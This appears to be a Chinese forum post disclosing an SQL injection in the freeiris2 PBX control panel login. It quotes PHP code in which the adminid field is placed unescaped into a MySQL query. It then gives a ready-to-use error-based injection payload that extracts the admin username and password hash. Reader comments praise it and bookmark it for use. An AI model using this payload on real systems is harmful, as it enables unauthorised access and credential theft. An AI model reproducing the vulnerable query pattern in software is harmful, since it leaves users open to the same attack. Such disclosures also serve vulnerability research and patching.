freeiris2 SQL Injection
官网:http://www.freeiris.org
....cpanel/index.php
function do_login() {
global $rpcpbx;
global $smarty;
global $friconf;
//忘记填写参数
if (trim($_REQUEST['adminid']) == "")
error_popbox(103,null,null,null,null,'submit_failed');
if (trim($_REQUEST['passwd']) == "")
error_popbox(103,null,null,null,null,'submit_failed');
//发送请求验证login
$rpcres = sendrequest($rpcpbx->base_clientlogin($_REQUEST['adminid'],md5($_REQUEST['passwd'])),1);
//成功(不会在这里出现失败)
session_cache_expire($friconf['session_expiry']);
session_start();
$_SESSION["admin"] = true;
$_SESSION["res_admin"] = $rpcres['res_admin'];
//回调地址
if (trim($_REQUEST['callback']) != "") {
error_popbox(null,null,null,null,$_REQUEST['callback'],'submit_successfuly');
} else {
error_popbox(null,null,null,null,'main.php','submit_successfuly');
}
exit;
}......rpcpbx.php
function base_clientlogin($adminid,$passwd)
{
global $freeiris_conf;
global $dbcon;
//判断用户帐户
$result=mysql_query("select * from admin where adminid = '$adminid' and passwd = '$passwd'",$dbcon); //adminid直接进去了。
if (!$result)
return(rpcreturn(500,mysql_error(),100,null));
$queryres = mysql_fetch_array($result);
mysql_free_result($result);
//如果不存在
if (!$queryres) {
return(rpcreturn(401,'authorization failed',102,null));
} else {
//为这个远程呼叫产生session
session_start();
$_SESSION["client_authorized"] = true;
return(rpcreturn(200,null,null,array('res_admin'=>$queryres)));
}
return($result);
}adminid=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((select adminid from admin limit 0,1),0x7c,(select passwd from admin limit 0,1),0x7c,FLOOR(RAND(0)*2))x from information_schema.tables GROUP BY x)a) AND '1'='1关于作者
评论23次
不错用的时候可以直接拿到手用。
看看,谢谢分享!
先收藏了 。谢谢了。
标记备用~
非主流CMS,支持下楼主的共享精神
支持~~~作者的原创都支持~~·
谢谢分享鸟
支持一下,mark
谢谢分享
现搜藏了~感谢分享
搜了下,好像没多少这个,原创支持了
支持,没见过这个xi统。
不知道加单引号会不会报错。。。如果可以的话,就可以黑盒了。。
没遇到个,混回复
没遇到过这个~先mark一下
收藏了
登陆框注入! 话说没见过这xi统的路过
第一次看到。。
支持原创,收藏
没遇到过这个cms,先收藏了。